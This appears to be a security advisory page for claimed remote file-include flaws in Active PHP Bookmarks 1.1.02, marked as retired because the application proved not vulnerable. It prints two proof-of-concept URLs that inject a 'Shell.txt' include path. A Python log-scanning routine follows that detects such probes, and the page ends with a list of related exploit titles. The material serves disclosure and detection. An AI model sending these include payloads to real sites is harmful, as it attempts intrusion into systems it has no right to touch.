source: http://www.securityfocus.com/bid/21263/info

Active PHP Bookmarks application is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.

Version 1.1.02 is vulnerable to this issue; other versions may also be affected.

This BID is being retired because further analysis reveals that the application is not vulnerable.

http://www.example.com/[Script_Path]/apb_common.php?APB_SETTINGS['apb_path']=Shell.txt?
http://www.example.com/[Script_Path]/apb.php?APB_SETTINGS['apb_path']=Shell.txt?
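For triage, requests shaped like the two URLs above can be picked out of web-server access logs. The following Python detection routine is an added example, not part of the original advisory or of Active PHP Bookmarks; the log lines, client addresses and the `/bookmarks/` path are constructed, and the function name `find_settings_override` is hypothetical.

```python
import re
from urllib.parse import unquote

# Scripts named in the advisory's two proof-of-concept URLs.
TARGET_SCRIPTS = ("apb.php", "apb_common.php")
# Client address and request target from a common/combined-format log line.
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# Query key that tries to set one element of the APB_SETTINGS array.
KEY_RE = re.compile(r"^APB_SETTINGS\[\s*['\"]?(?P<name>\w+)['\"]?\s*\]$", re.I)
# A value that starts with a URL scheme points at a remote resource.
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.I)

# Constructed sample log (documentation addresses, made-up /bookmarks/ path).
SAMPLE_LOG = """
198.51.100.7 - - [25/Nov/2006:10:01:02 +0000] "GET /bookmarks/apb.php?APB_SETTINGS['apb_path']=Shell.txt? HTTP/1.1" 200 512
198.51.100.7 - - [25/Nov/2006:10:01:09 +0000] "GET /bookmarks/apb_common.php?APB_SETTINGS%5B%27apb_path%27%5D=http%3A%2F%2Ffiles.example.net%2FShell.txt%3F HTTP/1.1" 200 512
192.0.2.10 - - [25/Nov/2006:10:02:30 +0000] "GET /bookmarks/apb.php?action=view&id=3 HTTP/1.1" 200 2048
192.0.2.10 - - [25/Nov/2006:10:02:41 +0000] "GET /index.php?APB_SETTINGS[apb_path]=x HTTP/1.1" 404 310
"""

def find_settings_override(log_lines):
    """Return one dict per query parameter that targets APB_SETTINGS[...]."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # blank or non-request line
        path, _, query = m.group("target").partition("?")
        script = unquote(path).rsplit("/", 1)[-1].lower()
        if script not in TARGET_SCRIPTS:
            continue  # only the two scripts from the advisory are of interest
        for pair in query.split("&"):
            raw_key, _, raw_value = pair.partition("=")
            key = KEY_RE.match(unquote(raw_key))  # catches %5B%27...%27%5D too
            if key:
                value = unquote(raw_value)
                hits.append({"ip": m.group("ip"), "script": script,
                             "setting": key.group("name"), "value": value,
                             "remote": bool(SCHEME_RE.match(value))})
    return hits

if __name__ == "__main__":
    for hit in find_settings_override(SAMPLE_LOG.strip().splitlines()):
        print(hit)
```

Because the BID was retired as not vulnerable, a hit indicates a probe against these scripts rather than proof of a successful include.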
Related Exploits
| Date | Title | Author |
|---|---|---|
| 2007-04-25 | Active PHP BookMarks 1.0 - 'APB.php' Remote File Inclusion | Ali & Saeid |
| 2008-08-19 | Active PHP BookMarks 1.1.02 - SQL Injection | Hussin X |
| 2009-12-22 | Active PHP BookMarks 1.3 - SQL Injection | Mr.Elgaarh |